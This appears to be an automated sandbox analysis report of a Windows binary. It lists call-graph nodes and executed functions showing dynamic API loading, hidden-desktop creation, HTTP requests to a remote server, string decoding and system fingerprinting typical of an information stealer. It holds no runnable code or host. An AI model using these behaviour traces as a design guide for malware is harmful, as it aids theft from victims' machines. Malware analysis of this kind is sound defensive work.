lstrlen 28799->28800 28801 13f3cb lstrcpy 28799->28801 28802 13f3e8 28800->28802 28801->28800 28803 13f3fb lstrlen 28802->28803 28804 13f3ef lstrcpy 28802->28804 28805 13f40c 28803->28805 28804->28803 28806 13f413 lstrcpy 28805->28806 28807 13f41f 28805->28807 28806->28807 28808 13f438 lstrcpy 28807->28808 28809 13f444 28807->28809 28808->28809 28810 13f466 lstrcpy 28809->28810 28811 13f472 28809->28811 28810->28811 28812 13f49a lstrcpy 28811->28812 28813 13f4a6 28811->28813 28812->28813 28814 13f4ca lstrcpy 28813->28814 28866 13f4e0 28813->28866 28814->28866 28815 13f4ec lstrlen 28815->28866 28816 13f699 lstrcpy 28816->28866 28817 13f581 lstrcpy 28817->28866 28818 13f5a5 lstrcpy 28818->28866 28819 121530 8 API calls 28819->28866 28820 13f6c8 lstrcpy 28879 13f6d0 28820->28879 28821 13f659 lstrcpy 28821->28866 28822 13f8ef StrCmpCA 28828 14006e 28822->28828 28822->28866 28823 13f77c lstrcpy 28823->28879 28824 13f7f6 StrCmpCA 28824->28822 28824->28879 28825 13fc09 StrCmpCA 28836 14000b 28825->28836 28825->28866 28826 13f91e lstrlen 28826->28866 28827 13ff2d StrCmpCA 28833 13ff40 Sleep 28827->28833 28842 13ff55 28827->28842 28829 14008d lstrlen 28828->28829 28831 140085 lstrcpy 28828->28831 28835 1400a7 28829->28835 28830 121530 8 API calls 28830->28879 28831->28829 28832 13fc38 lstrlen 28832->28866 28833->28866 28834 13f82a lstrcpy 28834->28879 28840 1400c7 lstrlen 28835->28840 28845 1400bf lstrcpy 28835->28845 28837 14002a lstrlen 28836->28837 28838 140022 lstrcpy 28836->28838 28843 140044 28837->28843 28838->28837 28839 13fa7e lstrcpy 28839->28866 28854 1400e1 28840->28854 28841 13ff74 lstrlen 28856 13ff8e 28841->28856 28842->28841 28846 13ff6c lstrcpy 28842->28846 28849 13ffae lstrlen 28843->28849 28852 14005c lstrcpy 28843->28852 28844 13f94f lstrcpy 28844->28866 28845->28840 28846->28841 28847 13fd98 lstrcpy 28847->28866 28848 13fc69 lstrcpy 28848->28866 28858 13ffc8 28849->28858 28850 13faad lstrcpy 28850->28879 28851 13f971 lstrcpy 28851->28866 28852->28849 28855 140101 28854->28855 28862 1400f9 lstrcpy 28854->28862 28863 121610 4 API calls 28855->28863 28856->28849 28864 13ffa6 lstrcpy 28856->28864 28857 13fdc7 lstrcpy 28857->28879 28867 13ffe8 28858->28867 28868 13ffe0 lstrcpy 28858->28868 28859 13f070 28 API calls 28859->28866 28860 13f878 lstrcpy 28860->28879 28861 13fc8b lstrcpy 28861->28866 28862->28855 28882 13fff3 28863->28882 28864->28849 28865 13f190 35 API calls 28865->28879 28866->28815 28866->28816 28866->28817 28866->28818 28866->28819 28866->28820 28866->28821 28866->28822 28866->28825 28866->28826 28866->28827 28866->28832 28866->28839 28866->28844 28866->28847 28866->28848 28866->28850 28866->28851 28866->28857 28866->28859 28866->28861 28870 13f9c2 lstrcpy 28866->28870 28873 13fcdc lstrcpy 28866->28873 28866->28879 28869 121610 4 API calls 28867->28869 28868->28867 28869->28882 28870->28866 28871 13fb04 lstrcpy 28871->28879 28872 13fb7e StrCmpCA 28872->28825 28872->28879 28873->28866 28874 13fe1e lstrcpy 28874->28879 28875 13fe98 StrCmpCA 28875->28827 28875->28879 28876 13fbab lstrcpy 28876->28879 28877 13fec9 lstrcpy 28877->28879 28878 13f070 28 API calls 28878->28879 28879->28823 28879->28824 28879->28825 28879->28827 28879->28830 28879->28834 28879->28860 28879->28865 28879->28866 28879->28871 28879->28872 28879->28874 28879->28875 28879->28876 28879->28877 28879->28878 28880 13fbf9 lstrcpy 28879->28880 28881 13ff1a lstrcpy 28879->28881 28880->28879 28881->28879 28882->27906 28884 142955 28883->28884 28885 14295c GetVolumeInformationA 28883->28885 28884->28885 28886 1429bc GetProcessHeap RtlAllocateHeap 28885->28886 28888 1429f6 wsprintfA 28886->28888 28889 1429f2 28886->28889 28888->28889 29106 1473f0 28889->29106 28893 124c70 28892->28893 28894 124c85 28893->28894 28895 124c7d lstrcpy 28893->28895 29110 124bc0 28894->29110 28895->28894 28897 124c90 28898 124ccc lstrcpy 28897->28898 28899 124cd8 28897->28899 28898->28899 28900 124cff lstrcpy 28899->28900 28901 124d0b 28899->28901 28900->28901 28902 124d2f lstrcpy 28901->28902 28903 124d3b 28901->28903 28902->28903 28904 124d6d lstrcpy 28903->28904 28905 124d79 28903->28905 28904->28905 28905->28905 28906 124da0 lstrcpy 28905->28906 28907 124dac InternetOpenA StrCmpCA 28905->28907 28906->28907 28908 124de0 28907->28908 28909 1254b8 InternetCloseHandle CryptStringToBinaryA 28908->28909 29114 144040 28908->29114 28910 1254e8 LocalAlloc 28909->28910 28927 1255d8 28909->28927 28912 1254ff CryptStringToBinaryA 28910->28912 28910->28927 28913 125517 LocalFree 28912->28913 28914 125529 lstrlen 28912->28914 28913->28927 28915 12553d 28914->28915 28917 125563 lstrlen 28915->28917 28918 125557 lstrcpy 28915->28918 28916 124dfa 28919 124e23 lstrcpy lstrcat 28916->28919 28920 124e38 28916->28920 28922 12557d 28917->28922 28918->28917 28919->28920 28921 124e5a lstrcpy 28920->28921 28924 124e62 28920->28924 28921->28924 28923 12558f lstrcpy lstrcat 28922->28923 28925 1255a2 28922->28925 28923->28925 28926 124e71 lstrlen 28924->28926 28929 1255d1 28925->28929 28930 1255c9 lstrcpy 28925->28930 28928 124e89 28926->28928 28927->27935 28931 124e95 lstrcpy lstrcat 28928->28931 28932 124eac 28928->28932 28929->28927 28930->28929 28931->28932 28933 124ed5 28932->28933 28934 124ecd lstrcpy 28932->28934 28935 124edc lstrlen 28933->28935 28934->28933 28936 124ef2 28935->28936 28937 124efe lstrcpy lstrcat 28936->28937 28938 124f15 28936->28938 28937->28938 28939 124f36 lstrcpy 28938->28939 28940 124f3e 28938->28940 28939->28940 28941 124f65 lstrcpy lstrcat 28940->28941 28942 124f7b 28940->28942 28941->28942 28943 124fa4 28942->28943 28944 124f9c lstrcpy 28942->28944 28945 124fab lstrlen 28943->28945 28944->28943 28946 124fc1 28945->28946 28947 124fcd lstrcpy lstrcat 28946->28947 28948 124fe4 28946->28948 28947->28948 28949 12500d 28948->28949 28950 125005 lstrcpy 28948->28950 28951 125014 lstrlen 28949->28951 28950->28949 28952 12502a 28951->28952 28953 125036 lstrcpy lstrcat 28952->28953 28954 12504d 28952->28954 28953->28954 28955 125079 28954->28955 28956 125071 lstrcpy 28954->28956 28957 125080 lstrlen 28955->28957 28956->28955 28958 12509b 28957->28958 28959 1250ac lstrcpy lstrcat 28958->28959 28960 1250bc 28958->28960 28959->28960 28961 1250da lstrcpy lstrcat 28960->28961 28962 1250ed 28960->28962 28961->28962 28963 12510b lstrcpy 28962->28963 28964 125113 28962->28964 28963->28964 28965 125121 InternetConnectA 28964->28965 28965->28909 28966 125150 HttpOpenRequestA 28965->28966 28967 1254b1 InternetCloseHandle 28966->28967 28968 12518b 28966->28968 28967->28909 29121 147520 lstrlen 28968->29121 28972 1251a4 29129 1474d0 28972->29129 28975 147490 lstrcpy 28976 1251c0 28975->28976 28977 147520 3 API calls 28976->28977 28978 1251d5 28977->28978 28979 147490 lstrcpy 28978->28979 28980 1251de 28979->28980 28981 147520 3 API calls 28980->28981 28982 1251f4 28981->28982 28983 147490 lstrcpy 28982->28983 28984 1251fd 28983->28984 28985 147520 3 API calls 28984->28985 28986 125213 28985->28986 28987 147490 lstrcpy 28986->28987 28988 12521c 28987->28988 28989 147520 3 API calls 28988->28989 28990 125231 28989->28990 28991 147490 lstrcpy 28990->28991 28992 12523a 28991->28992 28993 1474d0 2 API calls 28992->28993 28994 12524d 28993->28994 28995 147490 lstrcpy 28994->28995 28996 125256 28995->28996 28997 147520 3 API calls 28996->28997 28998 12526b 28997->28998 28999 147490 lstrcpy 28998->28999 29000 125274 28999->29000 29001 147520 3 API calls 29000->29001 29002 125289 29001->29002 29003 147490 lstrcpy 29002->29003 29004 125292 29003->29004 29005 1474d0 2 API calls 29004->29005 29006 1252a5 29005->29006 29007 147490 lstrcpy 29006->29007 29008 1252ae 29007->29008 29009 147520 3 API calls 29008->29009 29010 1252c3 29009->29010 29011 147490 lstrcpy 29010->29011 29012 1252cc 29011->29012 29013 147520 3 API calls 29012->29013 29014 1252e2 29013->29014 29015 147490 lstrcpy 29014->29015 29016 1252eb 29015->29016 29017 147520 3 API calls 29016->29017 29018 125301 29017->29018 29019 147490 lstrcpy 29018->29019 29020 12530a 29019->29020 29021 147520 3 API calls 29020->29021 29022 12531f 29021->29022 29023 147490 lstrcpy 29022->29023 29024 125328 29023->29024 29025 1474d0 2 API calls 29024->29025 29026 12533b 29025->29026 29027 147490 lstrcpy 29026->29027 29028 125344 29027->29028 29029 125370 lstrcpy 29028->29029 29030 12537c 29028->29030 29029->29030 29031 1474d0 2 API calls 29030->29031 29032 12538a 29031->29032 29033 1474d0 2 API calls 29032->29033 29034 125397 29033->29034 29035 147490 lstrcpy 29034->29035 29036 1253a1 29035->29036 29037 1253b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 29036->29037 29038 12549c InternetCloseHandle 29037->29038 29042 1253f2 29037->29042 29040 1254ae 29038->29040 29039 1253fd lstrlen 29039->29042 29040->28967 29041 12542e lstrcpy lstrcat 29041->29042 29042->29038 29042->29039 29042->29041 29043 125473 29042->29043 29044 12546b lstrcpy 29042->29044 29045 12547a InternetReadFile 29043->29045 29044->29043 29045->29038 29045->29042 29047 138e16 ExitProcess 29046->29047 29062 138e1d 29046->29062 29048 139032 29048->27937 29049 138e56 lstrlen 29049->29062 29050 138ed4 StrCmpCA 29050->29062 29051 138ef4 StrCmpCA 29051->29062 29052 138fd8 lstrlen 29052->29062 29053 138fbf StrCmpCA 29053->29062 29054 138e80 lstrlen 29054->29062 29055 138fa6 StrCmpCA 29055->29062 29056 138eaa lstrlen 29056->29062 29057 138f0d StrCmpCA 29057->29062 29058 138f2d StrCmpCA 29058->29062 29059 138f4d StrCmpCA 29059->29062 29060 138f6d StrCmpCA 29060->29062 29061 138f8d StrCmpCA 29061->29062 29062->29048 29062->29049 29062->29050 29062->29051 29062->29052 29062->29053 29062->29054 29062->29055 29062->29056 29062->29057 29062->29058 29062->29059 29062->29060 29062->29061 29063 13900b lstrcpy 29062->29063 29063->29062 29064->27943 29065->27945 29066->27951 29067->27953 29068->27959 29069->27961 29070->27967 29071->27971 29072->27977 29073->27979 29074->27983 29075->27997 29076->28001 29077->28000 29078->27996 29079->28000 29080->28015 29081->28003 29082->28004 29083->28008 29084->28011 29085->28017 29086->28023 29087->28026 29088->28033 29089->28054 29090->28058 29091->28057 29092->28053 29093->28057 29094->28067 29097 12161f 29096->29097 29098 12162b lstrcpy 29097->29098 29099 121633 29097->29099 29098->29099 29100 12164d lstrcpy 29099->29100 29101 121655 29099->29101 29100->29101 29102 12166f lstrcpy 29101->29102 29103 121677 29101->29103 29102->29103 29104 121699 29103->29104 29105 121691 lstrcpy 29103->29105 29104->28789 29105->29104 29107 1473f6 29106->29107 29108 142a30 29107->29108 29109 14740c lstrcpy 29107->29109 29108->27932 29109->29108 29111 124bd0 29110->29111 29111->29111 29112 124bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 29111->29112 29113 124c41 29112->29113 29113->28897 29115 144053 29114->29115 29116 14406f lstrcpy 29115->29116 29117 14407b 29115->29117 29116->29117 29118 1440a5 GetSystemTime 29117->29118 29119 14409d lstrcpy 29117->29119 29120 1440c3 29118->29120 29119->29118 29120->28916 29123 14753d 29121->29123 29122 12519b 29125 147490 29122->29125 29123->29122 29124 14754d lstrcpy lstrcat 29123->29124 29124->29122 29126 14749c 29125->29126 29127 1474c4 29126->29127 29128 1474bc lstrcpy 29126->29128 29127->28972 29128->29127 29131 1474ec 29129->29131 29130 1251b7 29130->28975 29131->29130 29132 1474fd lstrcpy lstrcat 29131->29132 29132->29130 29196 1433c0 GetSystemInfo wsprintfA 29160 138dca 16 API calls 29170 13c649 ShellExecuteEx 29154 14a490 __CxxFrameHandler 29171 143270 GetSystemPowerStatus 29189 142b70 GetCurrentProcess IsWow64Process 29143 1324f9 298 API calls 29135 128c79 strlen 29190 121b64 162 API calls 29197 12bbf9 90 API calls 29161 142de0 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA 29162 1325e9 290 API calls 29136 125869 57 API calls

                            Executed Functions

                            Function 001468F0 Relevance: 210.7, APIs: 115, Strings: 5, Instructions: 696libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 633 1468f0-1468f7 634 1468fd-146d09 GetProcAddress * 43 633->634 635 146d0e-146da2 LoadLibraryA * 8 633->635 634->635 636 146da4-146e13 GetProcAddress * 5 635->636 637 146e18-146e1f 635->637 636->637 638 146e25-146edd GetProcAddress * 8 637->638 639 146ee2-146ee9 637->639 638->639 640 146f5f-146f66 639->640 641 146eeb-146f5a GetProcAddress * 5 639->641 642 146f6c-146ff4 GetProcAddress * 6 640->642 643 146ff9-147000 640->643 641->640 642->643 644 147006-14711b GetProcAddress * 12 643->644 645 147120-147127 643->645 644->645 646 14719d-1471a4 645->646 647 147129-147198 GetProcAddress * 5 645->647 648 1471a6-1471cc GetProcAddress * 2 646->648 649 1471d1-1471d8 646->649 647->646 648->649 650 147205-14720c 649->650 651 1471da-147200 GetProcAddress * 2 649->651 652 147212-1472f8 GetProcAddress * 10 650->652 653 1472fd-147304 650->653 651->650 652->653 654 147306-14735d GetProcAddress * 4 653->654 655 147362-147369 653->655 654->655 656 14737e-147385 655->656 657 14736b-147379 GetProcAddress 655->657 658 147387-1473de GetProcAddress * 4 656->658 659 1473e3 656->659 657->656 658->659
                            APIs
                            • GetProcAddress.KERNEL32(75900000,013E6548), ref: 00146905
                            • GetProcAddress.KERNEL32(75900000,013E6568), ref: 0014691D
                            • GetProcAddress.KERNEL32(75900000,013F94F0), ref: 00146936
                            • GetProcAddress.KERNEL32(75900000,013F9520), ref: 0014694E
                            • GetProcAddress.KERNEL32(75900000,013FD5B0), ref: 00146966
                            • GetProcAddress.KERNEL32(75900000,013FD628), ref: 0014697F
                            • GetProcAddress.KERNEL32(75900000,013EBD00), ref: 00146997
                            • GetProcAddress.KERNEL32(75900000,013FD580), ref: 001469AF
                            • GetProcAddress.KERNEL32(75900000,013FD688), ref: 001469C8
                            • GetProcAddress.KERNEL32(75900000,013FD670), ref: 001469E0
                            • GetProcAddress.KERNEL32(75900000,013FD640), ref: 001469F8
                            • GetProcAddress.KERNEL32(75900000,013E6288), ref: 00146A11
                            • GetProcAddress.KERNEL32(75900000,013E6628), ref: 00146A29
                            • GetProcAddress.KERNEL32(75900000,013E6488), ref: 00146A41
                            • GetProcAddress.KERNEL32(75900000,013E64A8), ref: 00146A5A
                            • GetProcAddress.KERNEL32(75900000,013FD6A0), ref: 00146A72
                            • GetProcAddress.KERNEL32(75900000,013FD6D0), ref: 00146A8A
                            • GetProcAddress.KERNEL32(75900000,013EBD28), ref: 00146AA3
                            • GetProcAddress.KERNEL32(75900000,013E64E8), ref: 00146ABB
                            • GetProcAddress.KERNEL32(75900000,013FD6B8), ref: 00146AD3
                            • GetProcAddress.KERNEL32(75900000,013FD6E8), ref: 00146AEC
                            • GetProcAddress.KERNEL32(75900000,013FD5E0), ref: 00146B04
                            • GetProcAddress.KERNEL32(75900000,013FD658), ref: 00146B1C
                            • GetProcAddress.KERNEL32(75900000,013E6648), ref: 00146B35
                            • GetProcAddress.KERNEL32(75900000,013FD700), ref: 00146B4D
                            • GetProcAddress.KERNEL32(75900000,013FD550), ref: 00146B65
                            • GetProcAddress.KERNEL32(75900000,013FD568), ref: 00146B7E
                            • GetProcAddress.KERNEL32(75900000,013FD5F8), ref: 00146B96
                            • GetProcAddress.KERNEL32(75900000,013FD598), ref: 00146BAE
                            • GetProcAddress.KERNEL32(75900000,013FD5C8), ref: 00146BC7
                            • GetProcAddress.KERNEL32(75900000,013FD610), ref: 00146BDF
                            • GetProcAddress.KERNEL32(75900000,013FD1C0), ref: 00146BF7
                            • GetProcAddress.KERNEL32(75900000,013FD1A8), ref: 00146C10
                            • GetProcAddress.KERNEL32(75900000,013FA550), ref: 00146C28
                            • GetProcAddress.KERNEL32(75900000,013FD028), ref: 00146C40
                            • GetProcAddress.KERNEL32(75900000,013FD0A0), ref: 00146C59
                            • GetProcAddress.KERNEL32(75900000,013E62A8), ref: 00146C71
                            • GetProcAddress.KERNEL32(75900000,013FD088), ref: 00146C89
                            • GetProcAddress.KERNEL32(75900000,013E62C8), ref: 00146CA2
                            • GetProcAddress.KERNEL32(75900000,013FD040), ref: 00146CBA
                            • GetProcAddress.KERNEL32(75900000,013FD208), ref: 00146CD2
                            • GetProcAddress.KERNEL32(75900000,013E6308), ref: 00146CEB
                            • GetProcAddress.KERNEL32(75900000,013E6328), ref: 00146D03
                            • LoadLibraryA.KERNEL32(013FD118,001406EF), ref: 00146D15
                            • LoadLibraryA.KERNEL32(013FD220), ref: 00146D26
                            • LoadLibraryA.KERNEL32(013FD148), ref: 00146D38
                            • LoadLibraryA.KERNEL32(013FD238), ref: 00146D4A
                            • LoadLibraryA.KERNEL32(013FD190), ref: 00146D5B
                            • LoadLibraryA.KERNEL32(013FD100), ref: 00146D6D
                            • LoadLibraryA.KERNEL32(013FD058), ref: 00146D7F
                            • LoadLibraryA.KERNEL32(013FD070), ref: 00146D90
                            • GetProcAddress.KERNEL32(75FD0000,013E6A08), ref: 00146DAC
                            • GetProcAddress.KERNEL32(75FD0000,013FD1D8), ref: 00146DC4
                            • GetProcAddress.KERNEL32(75FD0000,013F9168), ref: 00146DDD
                            • GetProcAddress.KERNEL32(75FD0000,013FD0E8), ref: 00146DF5
                            • GetProcAddress.KERNEL32(75FD0000,013E6728), ref: 00146E0D
                            • GetProcAddress.KERNEL32(734B0000,013EB968), ref: 00146E2D
                            • GetProcAddress.KERNEL32(734B0000,013E6708), ref: 00146E45
                            • GetProcAddress.KERNEL32(734B0000,013EB6C0), ref: 00146E5E
                            • GetProcAddress.KERNEL32(734B0000,013FD1F0), ref: 00146E76
                            • GetProcAddress.KERNEL32(734B0000,013FCFC8), ref: 00146E8E
                            • GetProcAddress.KERNEL32(734B0000,013E67C8), ref: 00146EA7
                            • GetProcAddress.KERNEL32(734B0000,013E6848), ref: 00146EBF
                            • GetProcAddress.KERNEL32(734B0000,013FD010), ref: 00146ED7
                            • GetProcAddress.KERNEL32(763B0000,013E69E8), ref: 00146EF3
                            • GetProcAddress.KERNEL32(763B0000,013E66A8), ref: 00146F0B
                            • GetProcAddress.KERNEL32(763B0000,013FCF98), ref: 00146F24
                            • GetProcAddress.KERNEL32(763B0000,013FD0B8), ref: 00146F3C
                            • GetProcAddress.KERNEL32(763B0000,013E6688), ref: 00146F54
                            • GetProcAddress.KERNEL32(750F0000,013EBAD0), ref: 00146F74
                            • GetProcAddress.KERNEL32(750F0000,013EB6E8), ref: 00146F8C
                            • GetProcAddress.KERNEL32(750F0000,013FCF50), ref: 00146FA5
                            • GetProcAddress.KERNEL32(750F0000,013E6868), ref: 00146FBD
                            • GetProcAddress.KERNEL32(750F0000,013E6968), ref: 00146FD5
                            • GetProcAddress.KERNEL32(750F0000,013EB9B8), ref: 00146FEE
                            • GetProcAddress.KERNEL32(75A50000,013FCF68), ref: 0014700E
                            • GetProcAddress.KERNEL32(75A50000,013E67E8), ref: 00147026
                            • GetProcAddress.KERNEL32(75A50000,013F90B8), ref: 0014703F
                            • GetProcAddress.KERNEL32(75A50000,013FCF80), ref: 00147057
                            • GetProcAddress.KERNEL32(75A50000,013FCFB0), ref: 0014706F
                            • GetProcAddress.KERNEL32(75A50000,013E66C8), ref: 00147088
                            • GetProcAddress.KERNEL32(75A50000,013E68E8), ref: 001470A0
                            • GetProcAddress.KERNEL32(75A50000,013FCFE0), ref: 001470B8
                            • GetProcAddress.KERNEL32(75A50000,013FCFF8), ref: 001470D1
                            • GetProcAddress.KERNEL32(75A50000,CreateDesktopA), ref: 001470E7
                            • GetProcAddress.KERNEL32(75A50000,OpenDesktopA), ref: 001470FE
                            • GetProcAddress.KERNEL32(75A50000,CloseDesktop), ref: 00147115
                            • GetProcAddress.KERNEL32(75070000,013E6808), ref: 00147131
                            • GetProcAddress.KERNEL32(75070000,013FD0D0), ref: 00147149
                            • GetProcAddress.KERNEL32(75070000,013FD130), ref: 00147162
                            • GetProcAddress.KERNEL32(75070000,013FD160), ref: 0014717A
                            • GetProcAddress.KERNEL32(75070000,013FD178), ref: 00147192
                            • GetProcAddress.KERNEL32(74E50000,013E6988), ref: 001471AE
                            • GetProcAddress.KERNEL32(74E50000,013E6928), ref: 001471C6
                            • GetProcAddress.KERNEL32(75320000,013E6828), ref: 001471E2
                            • GetProcAddress.KERNEL32(75320000,013FD3E8), ref: 001471FA
                            • GetProcAddress.KERNEL32(6F060000,013E6888), ref: 0014721A
                            • GetProcAddress.KERNEL32(6F060000,013E6948), ref: 00147232
                            • GetProcAddress.KERNEL32(6F060000,013E6768), ref: 0014724B
                            • GetProcAddress.KERNEL32(6F060000,013FD418), ref: 00147263
                            • GetProcAddress.KERNEL32(6F060000,013E68C8), ref: 0014727B
                            • GetProcAddress.KERNEL32(6F060000,013E68A8), ref: 00147294
                            • GetProcAddress.KERNEL32(6F060000,013E6748), ref: 001472AC
                            • GetProcAddress.KERNEL32(6F060000,013E6908), ref: 001472C4
                            • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 001472DB
                            • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 001472F2
                            • GetProcAddress.KERNEL32(74E00000,013FD4D8), ref: 0014730E
                            • GetProcAddress.KERNEL32(74E00000,013F91E8), ref: 00147326
                            • GetProcAddress.KERNEL32(74E00000,013FD4C0), ref: 0014733F
                            • GetProcAddress.KERNEL32(74E00000,013FD4A8), ref: 00147357
                            • GetProcAddress.KERNEL32(74DF0000,013E69A8), ref: 00147373
                            • GetProcAddress.KERNEL32(6E340000,013FD430), ref: 0014738F
                            • GetProcAddress.KERNEL32(6E340000,013E69C8), ref: 001473A7
                            • GetProcAddress.KERNEL32(6E340000,013FD268), ref: 001473C0
                            • GetProcAddress.KERNEL32(6E340000,013FD280), ref: 001473D8
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                            • API String ID: 2238633743-3468015613
                            • Opcode ID: 077d3ea948b70061867f63ed4c573da6f3899bac19ba88b07cd1a697fc03f612
                            • Instruction ID: 356c8ba17b2237c9b356a06c3f24407d12a6366f645af2ad913305b9d80930c3
                            • Opcode Fuzzy Hash: 077d3ea948b70061867f63ed4c573da6f3899bac19ba88b07cd1a697fc03f612
                            • Instruction Fuzzy Hash: 4D622BB5611340EFD756DF64FC89A2677BEF78C703B10891AE956932B4DB34A800EB60
                            Function 00124C50 Relevance: 111.1, APIs: 61, Strings: 2, Instructions: 807stringnetworkCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00124C7F
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00124CD2
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00124D05
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00124D35
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00124D73
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00124DA6
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00124DB6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$InternetOpen
                            • String ID: "$------
                            • API String ID: 2041821634-2370822465
                            • Opcode ID: 771fba8224ca057402f30ee7d069c0cf1c6ead0cf7f6ae30d8c086901c763fa3
                            • Instruction ID: 534a209c69069d64c8574496759b2726cdda0d5d651fdd9f6cdb3b0fb737384f
                            • Opcode Fuzzy Hash: 771fba8224ca057402f30ee7d069c0cf1c6ead0cf7f6ae30d8c086901c763fa3
                            • Instruction Fuzzy Hash: 21529131901636ABDB21EFB4EC85BAE7BB9AF14305F181425F805AB261DB34DD52CBD0
                            Function 001465A0 Relevance: 58.0, APIs: 32, Strings: 1, Instructions: 218libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2125 1465a0-1465cd GetPEB 2126 1467d3-146833 LoadLibraryA * 5 2125->2126 2127 1465d3-1467ce call 146500 GetProcAddress * 20 2125->2127 2129 146835-146843 GetProcAddress 2126->2129 2130 146848-14684f 2126->2130 2127->2126 2129->2130 2132 146851-146877 GetProcAddress * 2 2130->2132 2133 14687c-146883 2130->2133 2132->2133 2134 146885-146893 GetProcAddress 2133->2134 2135 146898-14689f 2133->2135 2134->2135 2136 1468b4-1468bb 2135->2136 2137 1468a1-1468af GetProcAddress 2135->2137 2139 1468e7-1468ea 2136->2139 2140 1468bd-1468e2 GetProcAddress * 2 2136->2140 2137->2136 2140->2139
                            APIs
                            • GetProcAddress.KERNEL32(75900000,013F1538), ref: 001465F9
                            • GetProcAddress.KERNEL32(75900000,013F15B0), ref: 00146612
                            • GetProcAddress.KERNEL32(75900000,013F15F8), ref: 0014662A
                            • GetProcAddress.KERNEL32(75900000,013F15C8), ref: 00146642
                            • GetProcAddress.KERNEL32(75900000,013F91A8), ref: 0014665B
                            • GetProcAddress.KERNEL32(75900000,013E6588), ref: 00146673
                            • GetProcAddress.KERNEL32(75900000,013E6428), ref: 0014668B
                            • GetProcAddress.KERNEL32(75900000,013F1640), ref: 001466A4
                            • GetProcAddress.KERNEL32(75900000,013F1610), ref: 001466BC
